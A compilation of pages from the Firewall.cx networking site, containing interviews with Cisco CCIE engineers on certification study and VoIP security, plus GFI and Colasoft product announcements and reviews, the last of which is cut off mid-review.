Kevin Wallace, CCIEx2 (R/S and Voice) #7945, is a Certified Cisco Systems Instructor (CCSI #20061), and he holds multiple Cisco certifications, including CCNP Voice, CCSP, CCNP, and CCDP, in addition to multiple security and voice specializations. With Cisco experience dating back to 1989 (beginning with a Cisco AGS+ running Cisco IOS 7.x). Kevin has been a network design specialist for the Walt Disney World Resort, a senior technical instructor for SkillSoft/Thomson NETg/KnowledgeNet, and a network manager for Eastern Kentucky University. Kevin holds a Bachelor of Science Degree in Electrical Engineering from the University of Kentucky. Kevin lives in central Kentucky with his wife (Vivian) and two daughters (Stacie and Sabrina).

Firewall.cx Interview Questions

Q1. Hello Kevin and thanks for accepting Firewall.cx’s invitation. Can you tell us a bit about yourself, your career and daily routine as a CCIE (Voice) and Certified Cisco Systems Instructor (CCSI)?

Sure. As I was growing up, my father was the central office supervisor at the local GTE (General Telephone) office. So, I grew up in and around a telephone office. In college, I got a degree in Electrical Engineering, focusing on digital communications systems. Right out of college, I went to work for GTE Laboratories where I did testing of all kinds of telephony gear, everything from POTS (Plain Old Telephone Service) phones to payphones, key systems, PBX systems, and central office transmission equipment.

Then I went to work for a local university, thinking that I was going to be their PBX administrator but, to my surprise, they wanted me to build a data network from scratch, designed around a Cisco router. This was about 1989 and the router was a Cisco AGS+ router running Cisco IOS 7.x. And I just fell in love with it. I started doing more and more with Cisco routers and, later, Cisco Catalyst switches.

Also, if you know anything about my family and me you know we’re huge Disney fans and we actually moved from Kentucky to Florida where I was one of five Network Design Specialists for Walt Disney World. They had over 500 Cisco routers (if you count RSMs in Cat 5500s) and thousands of Cisco Catalyst switches. Working in the Magic Kingdom was an amazing experience.

However, due to a family health issue we had to move back to KY where I started teaching classes online for KnowledgeNet (a Cisco Learning Partner). This was in late 2000 and, even though we’ve been through a couple of acquisitions (first Thomson NETg and then Skillsoft), we’re still delivering Cisco authorized training live and online.

Being a Cisco trainer has been a dream job for me because it lets me stay immersed in Cisco technologies all the time. Of course I need, and want, to keep learning. I’m always in pursuit of some new certification. Just last year I earned my second CCIE, in Voice. My first CCIE, in Route/Switch, came way back in 2001.

In addition to teaching live online Cisco courses (mainly focused on voice technologies), I also write books and make videos for Cisco Press and have been for about the last ten years.

So, to answer your question about my daily routine: it’s a juggling act of course delivery and course development projects for Skillsoft and whatever book or video title I’m working on for Cisco Press.

Q2. We would like to hear your personal opinion on Firewall.cx’s technical articles covering Cisco technologies, VPN Security and CallManager Technologies. Would you recommend Firewall.cx to Cisco engineers and certification candidates around the world?

Firewall.cx has an amazing collection of free content. Much of the reference material is among the best I’ve ever seen. As just one example, the Protocol Map Cheat Sheet in the Downloads area is jaw-dropping. So, I would unhesitatingly recommend Firewall.cx to other Cisco professionals.

Q3. As a Cisco CCIE (Voice) and Certified Cisco Systems Instructor (CCSI) with more than 14 years experience, what preparation techniques do you usually recommend to students/engineers who are studying for Cisco certifications?

For me, it all starts with goal setting. What are you trying to achieve and why? If you don’t have a burning desire to achieve a particular certification, it’s too easy to run out of gas along your way.

You should also have a clear plan for how you intend to achieve your goal. “Mind mapping” is a tool that I find really useful for creating a plan. It might, for example, start with a goal to earn your CCNA. That main goal could then be broken down into subgoals such as purchasing a CCNA book from Cisco Press, building a home lab, joining an online study group, etc. Each of those subgoals could then be broken down even further.

Also, since I work for a Cisco Learning Partner (CLP), I’m convinced that attending a live training event is incredibly valuable in certification preparation. However, if a candidate’s budget doesn’t permit that I recommend using Cisco Press books and resources on Cisco’s website to self-study. You’ve also got to “get your hands dirty” working on the gear. So, I’m a big fan of constructing a home lab.

When I was preparing for each of my CCIE certifications, I dipped into the family emergency fund in order to purchase the gear I needed to practice on. I was then able to sell the equipment, nearly at the original purchase price, when I finished my CCIE study.

But rather than me rattling on about you should do this and that, let me recommend a super inexpensive book to your readers. It’s a book I wrote on being a success in your Cisco career. It’s called, “Your Route to Cisco Career Success,” and it’s available as a Kindle download (for $2.99) from Amazon.com.

If anyone reading this doesn’t have a Kindle reader or app, the book is also available as a free .PDF from the Products page of my website, 1ExamAMonth.com/products.

Q4. In today’s fast paced technological era, which Cisco certifications do you believe can provide a candidate with the best job opportunities?

I often recommend that certification candidates do a search on a job website, such as dice.com or monster.com, for various Cisco certs to see what certifications are in demand in their geographical area.

However, since Cisco offers certifications in so many different areas, certification candidates can pick an area of focus that’s interesting to them. So, I wouldn’t want someone to pursue a certification path just because they thought there might be more job opportunities in that track if they didn’t have an interest and curiosity about that field.

Before picking a specific specialization, I do recommend that everyone demonstrate that they know routing and switching. So, my advice is to first get your CCNA in Routing and Switching and then get your CCNP. At that point, decide if you want to specialize in a specific technology area such as security or voice, or if you want to go even deeper in the Routing and Switching arena and get your CCIE R/S.

Q5. There is a steady rise on Cisco Voice certifications and especially the CCVP certification. What resources would you recommend to readers who are pursuing their CCVP certification that will help them prepare for their exams?

Interestingly, Cisco has changed the name of the CCVP certification to the CCNP Voice certification, and it’s made up of five exams: CVOICE, CIPT1, CIPT2, TVOICE and CAPPS. Since I teach all of these classes live and online, I think that’s the best preparation strategy. However, it is possible to self-study for those exams. Cisco Press offers comprehensive study guides for the CVOICE, CIPT1 and CIPT2 exams. However, you’ll need to rely on the exam blueprints for the TVOICE and CAPPS exams, where you take each blueprint topic and find a resource (maybe a book, maybe a video, or maybe a document on Cisco’s website) to help you learn that topic.

For hands-on experience, having a home lab is great. However, you could rent rack time from one of the CCIE Voice training providers or purchase a product like my CCNP Voice Video Lab Bundle, which includes over 70 videos of lab walkthroughs for $117.

Q6. What is your opinion on Video based certification training as opposed to text books – Self Study Guides?

Personally I use, and create, both types of study materials. Books are great for getting deep into the theory and for being a real-world reference. However, for me, there’s nothing like seeing something actually configured from start to finish and observe the results. When I was preparing for my CCIE Voice lab I would read about a configuration, but many times I didn’t fully understand it until I saw it performed in a training video.

So, to answer your question: instead of recommending one or the other, I recommend both.

We thank Kevin Wallace for his time and interview with Firewall.cx.

 

 

  • Hits: 24696

Interview: Vivek Tiwari CCIEx2 #18616 (CCIE Routing and Switching and Service Provider)

CCIE Interview - Vivek Tiwari CCIE #18616  (CCIE Routing and Switching and Service Provider)Vivek Tiwari holds a Bachelor’s degree in Physics, MBA and many certifications from multiple vendors including Cisco’s CCIE.  With a double CCIE on R&S and SP track under his belt he mentors and coaches other engineers. 

Vivek has been working in the Inter-networking industry for more than fifteen years, consulting for many Fortune 100 organizations. These include service providers, as well as multinational conglomerate corporations and the public sector. His five plus years of service with Cisco’s Advanced Services has gained him the respect and admiration of colleagues and customers alike.

His experience includes, but is not limited to, network architecture, training, operations, management and customer relations, which made him a sought after coach and mentor, as well as a recognized leader. 

He is also the author of the following titles:

 “Your CCIE Lab Success Strategy the non-Technical guidebook

“Stratégie pour réussir votre Laboratoire de CCIE”

“Your CCNA Success Strategy Learning by Immersing – Sink or Swim”

“Your CCNA Success Strategy the non-technical guidebook for Routing and Switching”

Q1.  Hello Vivek and thanks for accepting Firewall.cx’s invitation for this interview.   Can you let us know a bit more about your double CCIE area of expertise and how difficult the journey to achieve it was?

I have my CCIE in Routing and Switching and Service Provider technologies. The first CCIE journey was absolutely difficult. I was extremely disappointed when I failed my lab the first time. This is the only exam in my life that I had not passed the first time. However, that failure made me realize that CCIE is difficult but within my reach. I realized the mistakes I was making, persevered and eventually passed Routing and Switching CCIE in about a year’s time.

After the first CCIE I promised myself never to go through this again but my co-author Dean Bahizad convinced me to try a second CCIE and surprisingly it was much easier this time and I passed my Service Provider lab in less than a year’s time.

We have chronicled our story and documented the huge number of lessons learned in our book Your CCIE Lab Success Strategy the non-technical guidebook. This book has been reviewed by your website and I am proud to state has been helping engineers all over the globe.

Q2. As a globally recognised and respected Cisco professional, what do you believe is the true value of Firewall.cx toward its readers?

Firewall.cx is a gem for its readers globally. Any article that I have read to date on Firewall.cx is well thought of and has great detailed information. The accompanying diagrams are fantastic. The articles get your attention and are well written because I have always read the full article and have never left it halfway.

The reviews for books are also very objective and give you a feel for it. Overall this is a great service to the network engineer community.

Thanks for making this happen.

Q3. Could you describe your daily routine as a Cisco double CCIE?

My daily routine as a CCIE depends on the consulting role that I am playing at that time. I will describe a few of them:

Operations: being in operations you will always be on the lookout for what outages happened in the last 24 hours or in the last week. Find the detailed root cause for it and suggest improvements. These could range from a change in design of the network to putting in new processes or more training at the appropriate levels.

Architecture: As an architect you are always looking into the future and trying to interpret the current and future requirements of your customer. Then you have to extrapolate these to make the network future proof for at least 5 to 7 years. Once that is done then you have to start working with network performance expected within the budget and see what part of the network needs enhancement and what needs to be cut.

This involves lots of meetings and whiteboard sessions.

Mix of the Above: After the network is designed you have to be involved at a pilot site where you make your design work with selected operations engineers to implement the new network. This ensures knowledge transfer and also proves that the design that looked good on the board is also working as promised.

All of the above does need documentation so working with Visio, writing white papers, implementation procedures and training documents are also a part of the job. Many engineers don’t like this but it is essential.

Q4. There are thousands of engineers out there working on their CCNA, CCNP and CCVP certifications.  Which certification do you believe presents the biggest challenge to its candidates?

All certifications have their own challenges. This challenge varies from one individual to another. However, in my mind CCNA is extremely challenging if it is done the proper way. I say this because most of the candidates doing CCNA are new to networking and they have not only to learn new concepts of IP addressing and routing but also have to learn the language of typing all those commands and making it work on a Cisco Device.

The multitude of learning makes it very challenging. Candidates are often stuck in a maze running from one website to another or studying one book and then another without any real results. That is the reason we have provided a GPS for CCNA, our book “Your CCNA exam Success Strategy the non-technical guidebook

I also want to point out that whenever we interview CCNA engineers many have the certificate but it seems they have not spent the time to learn and understand the technologies.

What they don’t understand is that if I am going to depend on them to run my network which has cost my company millions of dollars I would want a person with knowledge not just a certificate.

Q5. What resources do you recommend for CCNA, CCNP, CCVP and CCIE candidates, apart from the well-known self-study books?

Apart from all the books the other resources to have for sure are

  1. A good lab. It could be made of real network gear or a simulator, but you should be able to run scenarios on it.
  2. Hands on practice in labs.
  3. Be curious while doing labs and try different options (only on the lab network please)
  4. A positive attitude to learning and continuous improvement.
    a) Write down every week what you have done to improve your skills
    b) Don’t be afraid to ask questions.
  5. Lastly and most important have a mentor. Follow the guidelines in our book about choosing a mentor and how to take full advantage of a mentor. Remember a mentor is not there to spoon feed you: a mentor is there to make sure you are moving in the right direction and in case you are stuck to show you a way out (not to push you out of it). A mentor is a guide not a chauffeur.

Q6. When looking at the work of other Cisco engineers, e.g network designs, configurations-setup etc, what do you usually search for when trying to identify a knowledgeable and experienced Cisco engineer?

I usually do not look at a design and try to find a flaw in it. I do make a note of design discrepancies that come to my mind. I say that from experience because what you see as a flaw might be a design requirement. For example, I have seen that some companies send all the traffic coming inside from the firewall across the data center to a dedicated server farm where it is analysed and then sent across to the different parts of the company. It is very inefficient and adds delay but it is by design.

I have seen many differences in QOS policies even between different groups within the organizations.

If a network design satisfies the legal, statutory and organization requirements then it is the best design.

Q7. What advice would you give to our readers who are eager to become No.1 in their professional community? Is studying and obtaining certifications enough or is there more to it?

Studying is important but more important is to understand it and experience it. Obtaining certifications has become necessary now because that is one of the first ways that a candidate can prove to their prospective employer that they have learnt the technologies. If an employer is going to let you work on his network that will cost him thousands of dollars per minute of downtime (think eBay, amazon, PayPal, a car assembly line) or could even cost lives of people (think of a hospital network, or the emergency call network like the 911 in US, or the OnStar network in US) then they’d better be careful in hiring. I am sure you agree. Certification is what gets you in the door for an interview only but it is:

  • Your knowledge and understanding
  • Your experience
  • Your attitude towards your work
  • How well you work in teams
  • Which work related areas are of interest to you (Security, Voice, Wireless etc.) that gets you the job and makes you move ahead in your career.

The best way to move ahead and be No. 1 in your career is to do what you are passionate about. If you are pursuing your passion then it is not work anymore and you enjoy doing it and will excel beyond limits.

Another thing I would want to tell the readers is don’t chase money. Chase excellence in whatever you are doing and money will be the positive side effect of your excellence.

 

  • Hits: 34753

The New GFI EventsManager 2013 - Active Network and Server Monitoring

On the 21st of January 2013, GFI announced its new version of its popular GFI EventsManager, now named, GFI EventsManager 2013.

For those who are unaware of the product, GFI EventsManager is one of the most popular software solutions that allows a network administrator, engineer or IT manager to actively monitor a whole IT infrastructure from a single intuitive interface.

Even though GFI EventsManager has been in continuous development, this time GFI has surprised us once again by introducing highly anticipated features that make this product a one-of-a-kind winner.

gfi-eventsmanager-2013-features-1

Below is a list of some of the new features included in GFI EventsManager 2013 that make this product a must for any company:

  • Active network and server monitoring based on monitoring checks is now available and can function in conjunction with the log based monitoring system in order to provide a complete and thorough view of the status of your environment.
  • The unique combination of active network and server monitoring through log-based network and server monitoring provides you not only with incident identification but also with a complete set of logs from the assets that failed, making problem investigation and solving much easier.
  • Enhanced console security system helps complying with 'best practices' recommendations that imply access to data on a “need-to-know” basis. Starting with this version, each GFI EventsManager user can be assigned a subset of computers that he/she manages and the console will only allow usage of the data coming from those configured computers while the user is logged in.
  • New schema for parsing XML files, available by default, that enables monitoring of XML–based logs and configuration files.
  • New schema for parsing DHCP text logs that enables monitoring of DHCP IP assignment.
  • More flexibility for storing events: the new database system has been updated to include physical deletion of events for easier maintenance and collection to remote databases.
  • Hashing of log data for protection against attempts at tampering with the logs coming from outside the product, enables enhanced log consolidation and security.
  • New reports for J Sox and NERC CIP compliance.
  • Hits: 15388

Interview: Akhil Behl CCIEx2 #19564 (Voice & Security)

It's not everyday you get the chance to interview a CCIE, and especially a double CCIE!  Today, Firewall.cx interviews Akhil Behl, a Double CCIE (Voice & Security) #19564 and author of the popular Cisco Press title ‘Securing Cisco IP Telephony Networks'.

Akhil Behl's Biography

ccies author akhil behlAkhil Behl is a Senior Network Consultant with Cisco Advanced Services, focusing on Cisco Collaboration and Security architectures. He leads Collaboration and Security projects worldwide for Cisco Services and the Collaborative Professional Services (CPS) portfolio for the commercial segment. Prior to his current role, he spent 10 years working in various roles at Linksys, Cisco TAC, and Cisco AS. He holds CCIE (Voice and Security), PMP, ITIL, VMware VCP, and MCP certifications.

He has several research papers published to his credit in international journals including IEEE Xplore.

He is a prolific speaker and has contributed at prominent industry forums such as Interop, Enterprise Connect, Cloud Connect, Cloud Summit, Cisco SecCon, IT Expo, and Cisco Networkers.

Be sure to not to miss our on our review of Akhil's popular Securing Cisco IP Telephony Networks and outstanding article on Secure CallManager Express Communications - Encrypted VoIP Sessions with SRTP and TLS.

Readers can find outstanding Voice Related Technical Articles in our Cisco VoIP/CCME & CallManager Section.

Interview Questions

Q1. What are the benefits of a pure VoIP against a hybrid system?

Pure VoIP solutions are a recent addition to the overall VoIP portfolio. SIP trunks by service providers are helping covert PSTN world reachable by IP instead of TDM. A pure VoIP system has a number of advantages over a hybrid VoIP system for example:

  • All media and signaling is purely IP based and no digital or TDM circuits come into picture. This in turn implies better interoperability of various components within and outside the ecosystem.
  • Configuration, troubleshooting, and monitoring of a pure VoIP solution is much more lucid as compared to a hybrid system.
  • The security construct of a pure VoIP system is something which the provider and consumer can mutually agree upon and deploy. In other words, the enterprise security policies can now go beyond the usual frontiers up to the provider’s soft-switch/SBC.

Q2. What are the key benefits/advantages and disadvantages of using Cisco VoIP Telephony System, coupled with its security features?

Cisco’s IP Telephony / Unified Communications systems present a world class VoIP solution to consumers from small to medium to large enterprises and SMB’s as well as various business verticals such as education, finance, banking, energy sector, and government agencies. When the discussion is around security aspect of Cisco IP Telephony / UC solution, the advantages outweigh the disadvantages because of a multitude of factors:

  • Cisco IP Telephony endpoints, and underlying network gear is capable of providing robust security by means of built in security features
  • Cisco IP Telephony portfolio leverages industry standard cryptography and is compatible with any product based on RFC standards
  • Cisco engineering leaves no stone unturned to ensure that the IP Telephony products and applications deliver feature rich consumer experience; while maintaining a formidable security posture
  • Cisco Advanced Services helps consumers design, deploy, operate, and maintain a secure, stable, and robust Cisco IP Telephony network
  • Cisco IP Telephony and network applications / devices / servers can be configured on-demand to enable security to restrain a range of threats

Q3. As an author, please comment on the statement that your book can be used both as a reference and as a guide for security of Cisco IP Telephony implementation.

Over the past 10 years, I have seen people struggling with lack of a complete text which can act as a reference, a guide, and a companion to help resolve UC security queries pertinent to design, deployment, operation, and maintenance of a Cisco UC network. I felt there was a lack of a complete literature which could help one through various stages of Cisco UC solution development and build i.e. Plan, Prepare, Design, Implement, Operate, and Optimize (PPDIOO) and thought of putting together all my experience and knowledge in form of a book where the two realms i.e. Unified Communications and Security converge. More often than not, people from one realm are not acquainted with intricacies of the other. This book serves to fill in the otherwise prominent void between the UC and Security realms and acts as a guide and a reference text for professionals, engineers, managers, stakeholders, and executives.

Q4. What are today’s biggest security threats when dealing with Cisco Unified Communication installations?

While there are a host of threats out there which lurk around your Cisco UC solution, the most prominent ones are as follows:

  • Toll-Fraud
  • Eavesdropping
  • Session/Call hijacking
  • Impersonation or identity-theft
  • DOS and DDOS attacks
  • Poor or absent security guidelines or policy
  • Lack of training or education at user level on their responsibility towards corporate assets such as UC services

As you can see, not every threat is a technical threat and there’re threats pertinent to human as well as organizational factors. More often than not, the focus is only on technical threats while, organizations and decision makers should pay attention to other (non-technical) factors as well without which a well-rounded security construct is difficult to achieve.

Q5. When implementing SIP Trunks on CUCM/CUBE or CUCME, what steps should be taken to ensure Toll-Fraud is prevented?

An interesting question since, toll-fraud is a chronic issue. With advent of SIP trunks for PSTN access, the threat surface has evolved and a host of new threats comes into picture. While most of these threats can be mitigated at call-control and Session Border Controller (CUBE) level, an improper configuration of call restriction and privilege as well as a poorly implemented security construct can eventually lead to a toll-fraud. To prevent toll-fraud on SIP trunks following suggestions can be helpful:

  • Ensure that users are assigned the right calling search space (CSS) and partitions (in case of CUCM) or Class of Restriction (COR in case of CUCME)  at line/device level to have a granular control of who can dial what
  • Implement after-hour restrictions on CUCM and CUCME
  • Disable PSTN or out-dial from Cisco Unity, Unity Connection, and CUE or at least restrict it to a desirable local/national destination(s) as per organization’s policies
  • Implement strong pin/password policies to ensure user accounts cannot be compromised by brute force or dictionary based attacks
  • For softphones such as Cisco IP Communicator try and use extension mobility which gives an additional layer of security by enabling user to dial international numbers only when logged in to the right profile with right credentials
  • Disable PSTN to PSTN tromboning of calls is not required or as per organizational policies
  • Where possible enable secure SIP trunks and SIP authorization for trunk registration with provider
  • Implement COR where possible at SRST gateways to discourage toll-fraud during an SRST event
  • Monitor usage of the enterprise UC solution by call billing and reporting software (e.g. CAR) on an ongoing basis to detect any specific patterns or any abnormal usage

Q6. A common implementation of Cisco IP Telephony is to install the VoIP Telephony network on a separate VLAN – the Voice VLAN, which has restricted access through access lists applied on a central layer-3 switch. Is this common practice adequate to provide basic-level of security?

Well, I wouldn’t just filter the traffic at Layer 3 with access-lists or just do VLAN segregation at layer 2 but also enable security features such as:

  • Port security
  • DHCP snooping
  • Dynamic ARP Inspection (DAI)
  • 802.1x
  • Trusted Relay Point (TRP)
  • Firewall zoning

and so on, throughout the network to ensure that legitimate endpoints in voice VLAN (whether hard phones or softphones) can get access to enterprise network and resources. While most of the aforementioned features can be enabled without any additional cost, it’s important to understand the impact of enabling these features in a production network as well as to ensure that they are in-line with the corporate/IP Telephony security policy of the enterprise.

Q7. If you were asked to examine a customer’s VoIP network for security issues, what would be the order in which you would perform your security checks? Assume Cisco Unified Communications Manager Express with IP Telephones (wired & wireless), running on Cisco Catalyst switches with multiple VLANs (data, voice, guest network etc) and Cisco Aironet access points with a WLC controller. Firewall and routers exist, with remote VPN teleworkers

My first step towards assessing the security of the customer’s voice network will be to ask them for any recent or noted security incidents as it will help me understand where and how the incident could have happened and what are the key security breach or threats I should be looking at apart from the overall assessment.

I would then start at the customer’s security policy which can be a corporate security policy or an IP Telephony specific security policy to understand how they position security of enterprise/SMB communications in-line with their business processes. This is extremely important as, without proper information on what their business processes are and how security aligns with them I cannot advise them to implement the right security controls at the right places in the network. This also ensures that the customer’s business as usual is not interrupted when security is applied to the call-control, endpoints, switching infrastructure, wireless infrastructure, routing infrastructure, at firewall level, and for telecommuters.

Once I have enough information about the customer’s network and security policy, I will start at inspection of configuration of access switches, moving down to distribution, to core to data center access. I will look at the WLC and WAP configurations next followed by IOS router and firewall configuration.

Once done at network level, I will continue the data collection and analysis at CUCME end. This will be followed by an analysis of the endpoints (wired and wireless) as well as softphones for telecommuters.

At this point, I should have enough information to conduct a security assessment and provide a report/feedback to the customer and engage with the customer in a discussion about the opportunities for improvement in their security posture and construct to defend against the threats and security risks pertinent to their line of business.

Q8. At Firewall.cx, we are eagerly looking forward to our liaison with you, as a CCIE and as an expert on Cisco IP Telephony. To all our readers and members, what would be your message for all those who want to trace your footsteps towards a career in Cisco IP Telephony?

I started in IT industry almost a decade ago with Linksys support (a division of Cisco Systems). Then I worked with Cisco TAC for a couple of years in the security and AVVID teams, which gave me a real view and feel of things from both security and telephony domains. After Cisco TAC I joined the Cisco Advanced Services (AS) team where I was responsible for Cisco’s UC and security portfolio for customer facing projects. From thereon I managed a team of consultants. On the way I did CCNA, CCVP, CCSP, CCDP, and many other Cisco specialist certifications to enhance my knowledge and worked towards my first CCIE which was in Voice and my second CCIE which was in Security. I am a co-lead of Cisco AS UC Security Tiger Team and have been working on a ton of UC Security projects, consulting assignments, workshops, knowledge transfer sessions, and so on.

It’s almost two years ago when I decided to write a book on the very subject of my interest that is – UC/IP Telephony security. As I mentioned earlier in this interview, I felt there was a dire need of a title which could bridge the otherwise prominent gap between UC and Security domains.

My advice to anyone who wishes to make his/her career into Cisco IP Telephony domain is, ensure your basics are strong as the product may change and morph forms however, the basics will always remain the same. Always be honest with yourself and do what it takes to ensure that you complete your work/assignment – keeping in mind the balance between your professional and personal life. Lastly, do self-training or get training from Cisco/Partners on new products or services to ensure you are keeping up with the trends and changes in Cisco’s collaboration portfolio.

  • Hits: 35407

Software Review: Colasoft Capsa 7 Enterprise Network Analyzer

Reviewer: Arani Mukherjee

review-100-percent-badgeColasoft Capsa 7.2.1 Network Analyser was reviewed by Firewall.cx a bit more than a year ago. In a year Colasoft has managed to bring in the latest version of the Analyser software i.e. Version 7.6.1.

As a packet analyser, Colasoft Capsa Enterprise has already collected many accolades from many users and businesses, so I would refrain from turning this latest review into a comparison between the two versions. Since Colasoft has made the effort to give us a new version of a well established software, it’s only fair that I perform the review in light of the latest software. This only goes to prove that the new software is not just an upgraded version of the old one, but a heavy weight analyser in its own right.

capsa enterprise v7.1 review

As an effective packet analyser, the various functions performed are: detecting network issues; intrusion and misuse; isolating network problems; monitoring bandwidth; usage; data in motion; end point security and server as a day to day primary data source for network monitoring and management. Capsa is one of the most well known packet analysers available for use today and the reasons it occupies such an enviable position in the networking world are its simplicity in deployment, usage, and data representation. Let’s now put Capsa under the magnifying glass to have a better understanding of why it’s one of the best you can get.

colasoft Capsa enterprise traffic chart

Installing Colasoft Capsa Enterprise

I have mentioned before that I will not use this as an opportunity for comparison between the two versions. However, I must admit, Capsa has retained all the merits displayed in the older version. This is a welcome change as often I have witnessed newer versions of software suddenly abandoning certain features just after all the users have got used to it. So in light of that, the first thing notable is the ease of installation of the software. It was painless from the time you download the full version or the demo copy til you put in the license key information and activate it online. There are other ways of activating it but as a network manager why would someone install a packet analyser on a machine which does not have any network connection.

It takes 5-7 minutes to get the software up and running to a point where you can start collecting data about your network. It carries all the hallmarks of a seamless easy installation and deployment and for all of us, one less thing to worry about. Bearing in mind some of you might find an adhoc review of this software already done while Colasoft’s nChronos Server was being reviewed, I will try not to repeat myself.

Using Capsa Enterprise

You will be greeted with a non cluttered well designed front screen as displayed below.

The default view is the first tab called Dashboard. One you have selected which adapter you want to monitor, and you can have several sessions based on what you do, you hit the ‘Start’ button to start collecting data. The Dashboard then starts coming up with data as it is being gathered. The next screenshot shows what your dashboard will end up looking like:

packet sniffing main console traffic analyzer

Every tab on this software will display data based on what you want to see. In the Node Explorer on the left you can select either a full analysis or particular analysis based on either protocol, the physical nodes or IP nodes.

The Total Traffic Graph is a live progressing chart which can update its display as fast as 1 second, or as slow as up to 1 hour. If you don’t fancy the progressing line graph, you can ponder the bar chart at the bottom. For your benefit you can pause the live flow of the graph by right clicking and selecting ‘Pause Refresh’, as show below:

capsa enterprise main interface

The toolbar at the top needs particular mention because of the features it provides. My favourite was obviously the Utilisation and PPS meters. I forced a download from an FTP site and captured how the needles reacted. Also note the traffic chart which captured bytes per second. The needle position updated every 1 second:

colasoft capsa traffic

The Summary tab is there to provide the user with a full statistical analysis of the network traffic. The separated sections are self explanatory and do provide in-depth meta data.

The Diagnosis tab is of particular interest. It gives a full range view of what’s happening to the data in the network in terms of issues encountered:

capsa enterprise protocol diagnosis

The diagnosis is separated in terms of the actual layers, severity and event description. This I found to be very useful when defining the health of my network.

The Protocol tab gave me a ringside view of the protocols that were topping the list and what was responsible for what chunk of data flowing through the network. I deemed it useful when I wanted to find out who’s been downloading too much using FTP, or who has set up a simultaneous ping test of a node.

Physical and IP Endpoints tabs showed data conversations happening between the various nodes in my network. I actually used this feature to isolate two nodes which were responsible for a sizeable chunk of the network traffic within a LAN. A feature I’m sure network managers will find useful.

Physical, IP, TCP, and UDP Conversations is purely an expanded form of the info provided at the bottom of the previous two tabs.

My favourite tab was the Matrix. Not because of just the name but because of what it displayed. Every data transfer and its corresponding links were mapped based on IP nodes, Physical nodes. You also have the luxury of only seeing the top 100 in the above categories. Here’s a screenshot of my network in full bloom, the top 100 physical conversations:

colasoft capsa matrix analysis

The best display for me was when I selected Top 100 IPv4 Conversations and hovered the mouse over one particular conversation. Not only did Capsa tell me how many peers it was conversing with, it also showed me how many packets were received and sent:

review-capsa-enterprisev7-7

Further on the Packet tab is quite self explanatory. It shows every packet spliced up into its various protocol and encapsulation based components. This is one bit that definitely makes me feel like a Crime Scene Investigator, a feeling I also had while reviewing nChronos. I also sensed that this also helps in terms of understanding how a packet is built, and transferred across a network. Here’s a screenshot of one such packet:

capsa enterprise packet view

As shown above, the level of detail is exhaustive. I wish I’d had this tool when I was learning about packets and their structure. This would have made my learning experience a bit more pleasurable.

All of this is just under the Analysis section. Under the Tools section, you will find very useful applications like the Ping and the MAC Scanner. For me, the MAC Scanner was very useful as I could take a snapshot of all MAC addresses and then be able to compare any changes at a later date. This is useful if there is a change in any address and you are not aware of it. It could be anything from a network card change to a new node being added without you knowing.

I was pleasantly surprised about the level of flexibility of this software when it came to how you wish to see the data. There is the option to have your own charts, add filters against protocols to ignore data that is not important, create alarm conditions which will notify if a threshold is broken or met. A key feature for me was to be able to store packet data and then play it later on using the Packet Player, another nice tool in the Tools section. This historical lookup facility is essential for any comparison that needs be performed after a network issue has been dealt with.

Summary

I have worked with several packet or network analysers and I have to admit Capsa Enterprise captures data and displays it in the best way I have seen. My previous experiences were marred by features that were absent and features that didn’t work or deliver the expected outcome. Colasoft has done a brilliant job of delivering Capsa which meets all my expectations. This software is not only helpful for the network managers but also for students of computer networking. I definitely would have benefitted from Capsa had I known about it back then, but I have now. This tool puts network managers more in control of their networks and gives them that much needed edge for data interpretation. I would tag it with a ‘Highly Recommended’ logo.

 

  • Hits: 29734

Cloud-based Network Monitoring: The New Paradigm - GFI Free eBook

review-gfi-first-aid-kit-1GFI has once again managed to make a difference: They recently published a free eBook named "Cloud-based network monitoring: The new paradigm" as part of their GFI Cloud offerings.

IT managers face numerous challenges when deploying and managing  applications across their network infrastructure. Cloud computing and cloud-based services are the way forward.

This 28 page eBook covers a number of important key-topics which include:

  • Traditional Network Management
  • Cloud-based Network Monitoring: The new Paradigm
  • Big Challenges for Small Businesses
  • A Stronger Defense
  • How to Plan Ahead
  • Overcoming SMB Pain Points
  • The Best Toold for SMB's
  • ...and much more!

This eBook is no longer offered by the vendor. Please visit our Security Article section to gain access to similar articles.

  • Hits: 14004

GFI Network Server Monitor Online Review - Road Test

Reviewer: Alan Drury

review-100-percent-badgeThere’s a lot of talk about ‘the cloud’ these days, so we were intrigued when we were asked to review GFI’s new Cloud offering. Cloud-based solutions have the potential to revolutionise the way we work and make our lives easier, but can reality live up to the hype? Is the future as cloudy as the pundits say? Read on and find out.

What is GFI Cloud?

GFI Cloud is a new service from GFI that provides anti-virus (VIPRE) and workstation/server condition monitoring (Network Server Monitor Online) via the internet. Basically you sign up for GFI Cloud, buy licenses for the services you want and then deploy them to your internet-connected machines no matter where they are. Once that’s done, as long as you have a PC with a web browser you can monitor and control them from anywhere.

In this review we looked at GFI Network Server Monitor Online, but obviously to do that we had to sign up for GFI Cloud first.

Installation of GFI Network Server Monitor Online

Installation is quick and easy; so easy in fact that there’s no good reason for not giving this product a try. The whole installation, from signing up for our free 30-day trial to monitoring our first PC, took barely ten minutes.

To get started, simply follow the link from the GFI Cloud product page and fill in your details:

gfi-network-server-monitor-cloud-1

Next choose the service you’re interested in. We chose Network Server Monitor Online:

gfi-network-server-monitor-cloud-2

Then, after accepting the license agreement, you download and run the installer and that’s pretty much it:

gfi-network-server-monitor-cloud-3

Your selected GFI Cloud products are then automatically monitoring your first machine – how cool is that?

Below is a screenshot of the GFI Cloud desktop. The buttons down the left-hand side and the menu bar across the top let you view the output from either Server Monitor or VIPRE antivirus or, as shown here, you can have a status overview of your whole estate.

gfi-network-server-monitor-cloud-4

We’ve only got one machine set up here but we did add more, and a really useful touch is that machines with problems always float to the top so you need never be afraid of missing something. There’s a handy Filters box through which you can narrow down your view if required. You can add more machines and vary the services running on them, but we’ll come to that later. First let’s have a closer look at Network Server Monitor Online.

How Does It Work?

Network Server Monitor Online uses the GFI Cloud agent installed on each machine to run a series of health checks and report the results. The checks are automatically selected based on the type of machine and its OS. Here’s just a sample of those it applied to our tired XP laptop:

As well as the basics like free space on each of the volumes there’s a set of comprehensive checks to make sure the essential Windows services are running, checks for nasties being reported in the event logs and even a watch on the SMART status of the hard disk.

If these aren’t enough you can add your own similar checks and, usefully, a backup check:

gfi-network-server-monitor-cloud-6

This really is nice – the product supports lots of mainstream backup suites and will integrate with the software to check for successful completion of whatever backup regime you’ve set up. If you’re monitoring a server then that onerous daily backup check is instantly a thing of the past.

